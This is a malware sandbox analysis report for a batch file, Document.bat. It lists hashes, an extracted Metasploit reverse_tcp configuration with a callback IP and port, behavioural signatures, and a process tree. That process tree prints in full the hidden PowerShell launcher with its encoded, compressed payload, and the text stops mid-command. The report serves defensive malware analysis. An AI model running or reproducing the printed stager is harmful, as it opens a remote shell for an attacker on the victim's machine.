Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
15-11-2024 18:15
Static task
static1
Behavioral task
behavioral1
Sample
Document.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Document.bat
Resource
win10v2004-20241007-en
General
-
Target
Document.bat
-
Size
6KB
-
MD5
6bdc18d89eac8169f6783f768259ea94
-
SHA1
fa8d50f329b569909342fec35ec5e85eb1fc7e17
-
SHA256
00e92245ffdb75ba3700073c59eb3df585fb87f99d6eacb874899a471fbe4c6d
-
SHA512
ff8341450506a72910443a3ba53d3039b6a0e60930afed7f0ddcf40aa9f6a0d648fe83fa7171cae4fbfb3eff8354e5b498b91005b1d83790a97118cbf119c68b
-
SSDEEP
192:+n2jh1hqT2ZV/2aBTmmXCxsUo4/cB8FScgIJe2dHhW:+n2jh1hs2V9kmXCxTo4hYcgIdHhW
Malware Config
Extracted
metasploit
windows/reverse_tcp
89.197.154.116:7810
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Blocklisted process makes network request 10 IoCs
flow pid Process 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe 2 2128 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2288 powershell.exe 2128 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2288 powershell.exe 2128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2068 wrote to memory of 2296 2068 cmd.exe 32 PID 2068 wrote to memory of 2296 2068 cmd.exe 32 PID 2068 wrote to memory of 2296 2068 cmd.exe 32 PID 2296 wrote to memory of 2288 2296 cmd.exe 33 PID 2296 wrote to memory of 2288 2296 cmd.exe 33 PID 2296 wrote to memory of 2288 2296 cmd.exe 33 PID 2288 wrote to memory of 2128 2288 powershell.exe 34 PID 2288 wrote to memory of 2128 2288 powershell.exe 34 PID 2288 wrote to memory of 2128 2288 powershell.exe 34 PID 2288 wrote to memory of 2128 2288 powershell.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Document.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARAB5ADEALwBtAHsAMQB9AEMAQQA3ADEAVwBiAFcALwBhAFMAQgBEACsAZgBsAEwALwBnADEAVQBoADIAVgB7ADEAfQBkAHoARgB2AFQASgBsAEsAbABXADkAdgBoAEoAUQBrAEUANABnAEEAQgBpAGsANABiAGUAegBFAGIAMQBsADUAaQByADAATgBJAHIALwAvADkAWgBzAEUATwBpAFUASwBxADMARQBrADkAUwB5AFQANwBNAGoATQA3ACsAOAB3AHoATQB6AHQATABJADAAOQBRAEgAaQBsADgAZABkAFoANQBWAEgANQA4ACsARQBQAEoAdgBpADYATwBjAGEAaABvAGgAZAB0AFQAUQB5AGsAcwBIAHkANwAxADMAVgBaAGgATwBWAGEAKwBLAGQAbwBFAEwAWgBjAE8ARAB6AEcATgBwAHMAZgBIAGQAJwAnACsAJwAnAGgAcgBIAEoAQgBMAGIAZQBiAEYAQgBCAEUAbwBTAEUAdAA0AHcAUwBoAEoATgBWAC8ANQBXAGgAbgBNAFMAawA0AE8ATABtADEAdgBpAEMAZQBXAEgAVQB2AGkAcgAyAEcARAA4AEIAcgBOAE0AYgBHADEAagBiADAANgBVAEEAeABUADUAYwB1ACsAYwBlADEAaQA2AFYAWABTAFgAagBBAHAATgAvAGYANQBkADEAUwBjAEgANQBXAG4AeAA1AEMANwBGAEwATgBGAFUAZAA1ADAASQBFAGgAWgA5AHgAbABSAGQAKwBhAG4ATABBADYALwBXAFMANgBLAHAAYgBlAHIARgBQAE8ARQB6AFUAUgB6AFMAcQBGAG8AcAA5AHEATQBFAHoAMABnAEgAcgBOADIAVABOAGgARgB6ADcAaQBjAHEAWABHAFYAMwBtAFoAaQBJACcAJwArACcAJwBOAEkANwBrAG4AYQBTAFIAJwAnACsAJwAnAHIAewAxAH0AaQBtAHcAcgBBAGIAYwB3AC8ANQBmAGsAeQBTAFIARABXAFUAaQBUAFEALwBtAFUANwAvADEAQwBiAFoAMgBaAGQAcABKAEcAaABJAGkAcQAxAEkAawBKAGcAdgBYAFIATABmAFUANAA4AGsAeABTACcAJwArACcAJwBhAE8AZgBFAHsAMQB9AHUAeQBXAHcASwBXAHEANgBJAGEAUgBSAE0AZABSADMARQA3AHYAbQBDAGEASQBVAG8AWgBjAHgAUQAvAG8AMABaAHIAVQBOAFcATwBYAEwAdgBWAGQASwBlAEsANABGAFUAVgA4AFMANgBBAGQARgA4AGQAYwBzADIAOQAxAE4ARwB0AG4AcgBxAEgAagBjAGgALwBqAHAAOABHAFEAYwBBAHUAWgA4AFMAdgBGAGwATwBHADkATABhAHcANQBuAGQAUQB2ADUATgBOAGoAcwBFAG4ATgBXADYAUABLAEUAYgAxAFcAOQBLAHkAVgBEAGEAYwBEAEEAVwBQAEYANwBEAHQASABBAFYAcAAwAFMAZgBQAGsARQBOAFIAegBiADkAQwArAE8AOQAxAHMAcQA1AEsAaQBqAE8AUgBtAGsANwBnAGIAWABKAGcARgBOAC8AdQByAFAAdwBJACcAJwArACcAJwB2AEsARgA0AEwATQBVAGUAWgB2AEYARABwAG4AUgBpAEQAagByAEMASQBmAFUAeQA0AG0AcQA3AFEAcwBIAG0AVABHAHkAQQBhAFMAewAxAH0AaQAzAFgAQQBRAFUAMwBOAE4AbwBqAHYARQBFAHsAMQB9AEMATABDAFQARQBrAGgAVwB2ADEARQA1AEMASwBwADUAMAByAFoAUQB5AG4AOABUAEkAZwA1AEEAbQA0AEIAVgBFAFcAMwAvAHAAegBEAFoAcQBtAHQAcQBLADIAaQBRAEUAOQBMAFoAegBvAEcAbABoAEIAdQBsAEIAYwB1AGsAcwBKAGQAYgA1ADYAWABJAE8AUQBxAHIATgBjAEoASQB7ADEAfQBTAGoAZQBGAC8AUABRAE0AeABTAFcAewAxAH0ARQBkADkAUQBVAEoAVABRAGIAJwAnACsAJwAnAEEAJwAnACsAJwAnAHUAbABnAG0AKwBHADYAcwA3AGQAZABzAG8ARQA5AFgAQQBpAGMAbgBOAFQALwBRAFcAewAxAH0AMgBhAEUAMgAnACcAKwAnACcAagB4AEkAUgBwAHgANQBFAEYAUQBDADQAYwBwAGYARQBvADUAaABKAFAAQQB5AGwAUwBYADEAaQByAFYAMABhADUASQBlAHIAZQA5AEcAdwBNAFcATwBRAE4AbQBEAHAASABxAEkAQgBLAHgASQBGAFYAMAAnACcAKwAnACcAaQB1AHgATAA2AHgANQB7ADEAfQBWAGUAZABJAGwAbwBoAFUAdABHAFEAcABEAFoAVgBJAHMANgB3AHcASABVAGgAaQB3ADUATgB1AFQAQwBBAGYASABWAHYAVwA3AG0ATwBiAEEAbAB2AEUAUQBsAGgAKwBPAFoAawB4AEIAcQBsADMARgBoAEsAQQBNAGEAQwA2AGcAOABHADQAUQBsAHQALwA2AFQARQA2ACsATABEAG4AaABqAHgAeQBTAEwAagBKAFoAbgAxADgAUgBhAEMANQBrAEEAaABhAGcAaABDAFoAcgAnACcAKwAnACcAaABzADAARQBqAEYAbwBCAEUAUABlAGEAaABoAFIATgB5AFcATgB1AFcARgArADIAagBlAFUARwA3AEMATAA2AFIAMAAzAFEAcABHAFMAeABvAHUAYgBXAEMAWAB4AHQAKwBmAGUAZQBMAGYAMwBaADYAMgB6AFIAcAB0AGMAWABiAG4AcAAxADAARwAvAFcAdgBpAEsANgBDAGwAZgBlADEAZwB6AHoALwAxAEMAZABIAEwAcwBqADEAQgBqAFYAaABkADEARwB6AFIAMAB0AFcAYgAnACcAKwAnACcAZQA1AFoAcABTAHMANQBMAGcAYwBCADgAagB1AHcARgBvAHoAbQBIAGkAdAAxAFQAOABMAHoAVABpAHUAeAB5AG0AQwB2ADcAVABuAFcANAA2AHEAUwBBAEUAMQByAHQAZQAnACcAKwAnACcAWgAxAEMAVgBXAHIAdAB7ADEAfQB0AHEAYQBRAEgAZwBqAFUAQgB2AEEAWABvAGgAWABUADIAYwB3AHgAagBxADYATQBXADUAQgBYAHEAbABGAGoAcwA1AHQAUwA5AHYAaABwAFgANgBlAE0AaQBhAFoAcQAwACsAbgB3ADEANQAnACcAKwAnACcANABoADYATwBIAE4ATQAwAGoAMwB6AHMAdABOAGMASQBXAGQAeQB2AHQAdABmAFgANQBVAHQAKwAxAGYAUgBDAHEAeABaAHgAOAA4AGkAdQBMAGQAQQBKAFEAbgBaADAATQBxAGgAYgAvAEcAeABrAHgAYQBoAHIARABuAEMAdwA1AEUATgB2AGkAUAAxAEcAewAxAH0AQwBQAHIAMABLACcAJwArACcAJwBaAGsAMwBPAHYAWAByAFYANgB2AGIAcQBGACsANAAvAGIATwBPAFQASQBEADgAMgBoADQAagBlAGYAVwBjAEYAQwBoADQAKwBYADEANQBSAHoAbQA5AFYAVwB6AGQAMgBhAFcAYQBpADIAJwAnACsAJwAnAGYAUABQAEwAeABDAG8AQgByAGMASQBTAEQAUwA1AEEASgA3AEkAbwAzAG4ANABHAE0AOAB3AGwAWgBuAHoAbwA4AHEAZQBDAEYAeABaAEUARgBNAHYAWAB4AEgAVwByAE0AUgA4AHQANgBsADgASAArAFYAYgAvAEMAMAB7ADEAfQBCADEAcgBqAEUANgBIADYALwByAHAAbABrAGUAZABXAHUAbwBXAGUATABEAFIAbwBCADYASQBJADQARABxADQAJwAnACsAJwAnAGQAUgBjAHUAOAA4AE8AbQBaADUANABIAE4ALwArAEwAawB6AG0AcABtAEQAYQAvAGIARgBkAE8AeABlAGQAMwA0AHQANwAyAHcAdQBRAC8AbAAzADEAWABUAE8AdgBIAEYANQA1AFYAMQA4ACsAWABvACsAcABJAE8AUQBvADcANQBwAEQAagA0AEMASgBTAFoAOQBHAG8AbABxAFoAVgBvAFEANwBxAEUAcwBtAGgALwArAEsAUABnADMAegBqAE4AaQB2AE4AVQBNADIAagBoAE8ANQBwAGcAQgB7ADEAfQBhAEQATwA1AHoAbABiADUAMwBFADkASwA5ADUAZABUAHEAVwBHAHAAbQAxADcALwA0AEwARQBFAFcASABRAE0AcQBHAHAANQBuAHgASABqAEgARgBQAE4AZwA2AG8AOAA5AEMAeQB0AG8AMQBFADkAcgBWACsAYQArAFAAVAB2AHAARwB1AFAAQQBuAHEAdQA0AGEAUwBMAHgAMABmAGoAOABGAEoAUwBKACsAbwBVAFQAdwBuAFUAUwBEAG0AUgB1AG0AaABXAGkAcABCAEwAeQBnADkAbABHAHEAYgBMAEgAbgAvAHgAVwB5ACsAWABFAE8AdgBhACcAJwArACcAJwBoAGkAeQBsADAAaAB7ADEAfQB0AG8AYgBaAHgAagBEAHsAMQB9AG8AagBOAEYAMAAvADQASABuAE8AQwB0AEkASwBCADIAdgB7ADEAfQBYAFUAVwA2AEQAQgAwAFEAcwBvAE4AVgBEADUAdAB2AGsAdgBvAGIATQA0AFoAOAArACcAJwArACcAJwBCADIAOQA3AHEAaQBRAFEANwAyAEEAQwB2AE0AdAB4ADYASQBwADgASQBrAGgAdQBnAGYAVQBEAHUAbABJAEsAUQBYAGYAUgA1AFYAeQA2AGsAOQA3ACsAWgBMAFYAawBOAG0AOABNAC8ALwA5AGQAcwAyAGEAMwA5AHsAMQB9AHYAZABkAEQAQwBvAFoARwAyAFIAZQByAGIANQBjAGUARgBiADYAZgB5AGMAQQBRADAAdwBGACcAJwArACcAJwBpAEwAcABRAGoAQgBuAFoAdgBnADMAMgA0AFoAQQBsAHkATABQAGcAcAB2AGQAQQAvADEAbgAyAHkAWABmAHkAUgBTAG8ATwBPAHYARAAyADIAcgBTAEMAZgB3AEMAVwBJAEUAZABNAG4AZwBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAWQAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==2⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARAB5ADEALwBtAHsAMQB9AEMAQQA3ADEAVwBiAFcALwBhAFMAQgBEACsAZgBsAEwALwBnADEAVQBoADIAVgB7ADEAfQBkAHoARgB2AFQASgBsAEsAbABXADkAdgBoAEoAUQBrAEUANABnAEEAQgBpAGsANABiAGUAegBFAGIAMQBsADUAaQByADAATgBJAHIALwAvADkAWgBzAEUATwBpAFUASwBxADMARQBrADkAUwB5AFQANwBNAGoATQA3ACsAOAB3AHoATQB6AHQATABJADAAOQBRAEgAaQBsADgAZABkAFoANQBWAEgANQA4ACsARQBQAEoAdgBpADYATwBjAGEAaABvAGgAZAB0AFQAUQB5AGsAcwBIAHkANwAxADMAVgBaAGgATwBWAGEAKwBLAGQAbwBFAEwAWgBjAE8ARAB6AEcATgBwAHMAZgBIAGQAJwAnACsAJwAnAGgAcgBIAEoAQgBMAGIAZQBiAEYAQgBCAEUAbwBTAEUAdAA0AHcAUwBoAEoATgBWAC8ANQBXAGgAbgBNAFMAawA0AE8ATABtADEAdgBpAEMAZQBXAEgAVQB2AGkAcgAyAEcARAA4AEIAcgBOAE0AYgBHADEAagBiADAANgBVAEEAeABUADUAYwB1ACsAYwBlADEAaQA2AFYAWABTAFgAagBBAHAATgAvAGYANQBkADEAUwBjAEgANQBXAG4AeAA1AEMANwBGAEwATgBGAFUAZAA1ADAASQBFAGgAWgA5AHgAbABSAGQAKwBhAG4ATABBADYALwBXAFMANgBLAHAAYgBlAHIARgBQAE8ARQB6AFUAUgB6AFMAcQBGAG8AcAA5AHEATQBFAHoAMABnAEgAcgBOADIAVABOAGgARgB6ADcAaQBjAHEAWABHAFYAMwBtAFoAaQBJACcAJwArACcAJwBOAEkANwBrAG4AYQBTAFIAJwAnACsAJwAnAHIAewAxAH0AaQBtAHcAcgBBAGIAYwB3AC8ANQBmAGsAeQBTAFIARABXAFUAaQBUAFEALwBtAFUANwAvADEAQwBiAFoAMgBaAGQAcABKAEcAaABJAGkAcQAxAEkAawBKAGcAdgBYAFIATABmAFUANAA4AGsAeABTACcAJwArACcAJwBhAE8AZgBFAHsAMQB9AHUAeQBXAHcASwBXAHEANgBJAGEAUgBSAE0AZABSADMARQA3AHYAbQBDAGEASQBVAG8AWgBjAHgAUQAvAG8AMABaAHIAVQBOAFcATwBYAEwAdgBWAGQASwBlAEsANABGAFUAVgA4AFMANgBBAGQARgA4AGQAYwBzADIAOQAxAE4ARwB0AG4AcgBxAEgAagBjAGgALwBqAHAAOABHAFEAYwBBAHUAWgA4AFMAdgBGAGwATwBHADkATABhAHcANQBuAGQAUQB2ADUATgBOAGoAcwBFAG4ATgBXADYAUABLAEUAYgAxAFcAOQBLAHkAVgBEAGEAYwBEAEEAVwBQAEYANwBEAHQASABBAFYAcAAwAFMAZgBQAGsARQBOAFIAegBiADkAQwArAE8AOQAxAHMAcQA1AEsAaQBqAE8AUgBtAGsANwBnAGIAWABKAGcARgBOAC8AdQByAFAAdwBJACcAJwArACcAJwB2AEsARgA0AEwATQBVAGUAWgB2AEYARABwAG4AUgBpAEQAagByAEMASQBmAFUAeQA0AG0AcQA3AFEAcwBIAG0AVABHAHkAQQBhAFMAewAxAH0AaQAzAFgAQQBRAFUAMwBOAE4AbwBqAHYARQBFAHsAMQB9AEMATABDAFQARQBrAGgAVwB2ADEARQA1AEMASwBwADUAMAByAFoAUQB5AG4AOABUAEkAZwA1AEEAbQA0AEIAVgBFAFcAMwAvAHAAegBEAFoAcQBtAHQAcQBLADIAaQBRAEUAOQBMAFoAegBvAEcAbABoAEIAdQBsAEIAYwB1AGsAcwBKAGQAYgA1ADYAWABJAE8AUQBxAHIATgBjAEoASQB7ADEAfQBTAGoAZQBGAC8AUABRAE0AeABTAFcAewAxAH0ARQBkADkAUQBVAEoAVABRAGIAJwAnACsAJwAnAEEAJwAnACsAJwAnAHUAbABnAG0AKwBHADYAcwA3AGQAZABzAG8ARQA5AFgAQQBpAGMAbgBOAFQALwBRAFcAewAxAH0AMgBhAEUAMgAnACcAKwAnACcAagB4AEkAUgBwAHgANQBFAEYAUQBDADQAYwBwAGYARQBvADUAaABKAFAAQQB5AGwAUwBYADEAaQByAFYAMABhADUASQBlAHIAZQA5AEcAdwBNAFcATwBRAE4AbQBEAHAASABxAEkAQgBLAHgASQBGAFYAMAAnACcAKwAnACcAaQB1AHgATAA2AHgANQB7ADEAfQBWAGUAZABJAGwAbwBoAFUAdABHAFEAcABEAFoAVgBJAHMANgB3AHcASABVAGgAaQB3ADUATgB1AFQAQwBBAGYASABWAHYAVwA3AG0ATwBiAEEAbAB2AEUAUQBsAGgAKwBPAFoAawB4AEIAcQBsADMARgBoAEsAQQBNAGEAQwA2AGcAOABHADQAUQBsAHQALwA2AFQARQA2ACsATABEAG4AaABqAHgAeQBTAEwAagBKAFoAbgAxADgAUgBhAEMANQBrAEEAaABhAGcAaABDAFoAcgAnACcAKwAnACcAaABzADAARQBqAEYAbwBCAEUAUABlAGEAaABoAFIATgB5AFcATgB1AFcARgArADIAagBlAFUARwA3AEMATAA2AFIAMAAzAFEAcABHAFMAeABvAHUAYgBXAEMAWAB4AHQAKwBmAGUAZQBMAGYAMwBaADYAMgB6AFIAcAB0AGMAWABiAG4AcAAxADAARwAvAFcAdgBpAEsANgBDAGwAZgBlADEAZwB6AHoALwAxAEMAZABIAEwAcwBqADEAQgBqAFYAaABkADEARwB6AFIAMAB0AFcAYgAnACcAKwAnACcAZQA1AFoAcABTAHMANQBMAGcAYwBCADgAagB1AHcARgBvAHoAbQBIAGkAdAAxAFQAOABMAHoAVABpAHUAeAB5AG0AQwB2ADcAVABuAFcANAA2AHEAUwBBAEUAMQByAHQAZQAnACcAKwAnACcAWgAxAEMAVgBXAHIAdAB7ADEAfQB0AHEAYQBRAEgAZwBqAFUAQgB2AEEAWABvAGgAWABUADIAYwB3AHgAagBxADYATQBXADUAQgBYAHEAbABGAGoAcwA1AHQAUwA5AHYAaABwAFgANgBlAE0AaQBhAFoAcQAwACsAbgB3ADEANQAnACcAKwAnACcANABoADYATwBIAE4ATQAwAGoAMwB6AHMAdABOAGMASQBXAGQAeQB2AHQAdABmAFgANQBVAHQAKwAxAGYAUgBDAHEAeABaAHgAOAA4AGkAdQBMAGQAQQBKAFEAbgBaADAATQBxAGgAYgAvAEcAeABrAHgAYQBoAHIARABuAEMAdwA1AEUATgB2AGkAUAAxAEcAewAxAH0AQwBQAHIAMABLACcAJwArACcAJwBaAGsAMwBPAHYAWAByAFYANgB2AGIAcQBGACsANAAvAGIATwBPAFQASQBEADgAMgBoADQAagBlAGYAVwBjAEYAQwBoADQAKwBYADEANQBSAHoAbQA5AFYAVwB6AGQAMgBhAFcAYQBpADIAJwAnACsAJwAnAGYAUABQAEwAeABDAG8AQgByAGMASQBTAEQAUwA1AEEASgA3AEkAbwAzAG4ANABHAE0AOAB3AGwAWgBuAHoAbwA4AHEAZQBDAEYAeABaAEUARgBNAHYAWAB4AEgAVwByAE0AUgA4AHQANgBsADgASAArAFYAYgAvAEMAMAB7ADEAfQBCADEAcgBqAEUANgBIADYALwByAHAAbABrAGUAZABXAHUAbwBXAGUATABEAFIAbwBCADYASQBJADQARABxADQAJwAnACsAJwAnAGQAUgBjAHUAOAA4AE8AbQBaADUANABIAE4ALwArAEwAawB6AG0AcABtAEQAYQAvAGIARgBkAE8AeABlAGQAMwA0AHQANwAyAHcAdQBRAC8AbAAzADEAWABUAE8AdgBIAEYANQA1AFYAMQA4ACsAWABvACsAcABJAE8AUQBvADcANQBwAEQAagA0AEMASgBTAFoAOQBHAG8AbABxAFoAVgBvAFEANwBxAEUAcwBtAGgALwArAEsAUABnADMAegBqAE4AaQB2AE4AVQBNADIAagBoAE8ANQBwAGcAQgB7ADEAfQBhAEQATwA1AHoAbABiADUAMwBFADkASwA5ADUAZABUAHEAVwBHAHAAbQAxADcALwA0AEwARQBFAFcASABRAE0AcQBHAHAANQBuAHgASABqAEgARgBQAE4AZwA2AG8AOAA5AEMAeQB0AG8AMQBFADkAcgBWACsAYQArAFAAVAB2AHAARwB1AFAAQQBuAHEAdQA0AGEAUwBMAHgAMABmAGoAOABGAEoAUwBKACsAbwBVAFQAdwBuAFUAUwBEAG0AUgB1AG0AaABXAGkAcABCAEwAeQBnADkAbABHAHEAYgBMAEgAbgAvAHgAVwB5ACsAWABFAE8AdgBhACcAJwArACcAJwBoAGkAeQBsADAAaAB7ADEAfQB0AG8AYgBaAHgAagBEAHsAMQB9AG8AagBOAEYAMAAvADQASABuAE8AQwB0AEkASwBCADIAdgB7ADEAfQBYAFUAVwA2AEQAQgAwAFEAcwBvAE4AVgBEADUAdAB2AGsAdgBvAGIATQA0AFoAOAArACcAJwArACcAJwBCADIAOQA3AHEAaQBRAFEANwAyAEEAQwB2AE0AdAB4ADYASQBwADgASQBrAGgAdQBnAGYAVQBEAHUAbABJAEsAUQBYAGYAUgA1AFYAeQA2AGsAOQA3ACsAWgBMAFYAawBOAG0AOABNAC8ALwA5AGQAcwAyAGEAMwA5AHsAMQB9AHYAZABkAEQAQwBvAFoARwAyAFIAZQByAGIANQBjAGUARgBiADYAZgB5AGMAQQBRADAAdwBGACcAJwArACcAJwBpAEwAcABRAGoAQgBuAFoAdgBnADMAMgA0AFoAQQBsAHkATABQAGcAcAB2AGQAQQAvADEAbgAyAHkAWABmAHkAUgBTAG8ATwBPAHYARAAyADIAcgBTAEMAZgB3AEMAVwBJAEUAZABNAG4AZwBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAWQAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 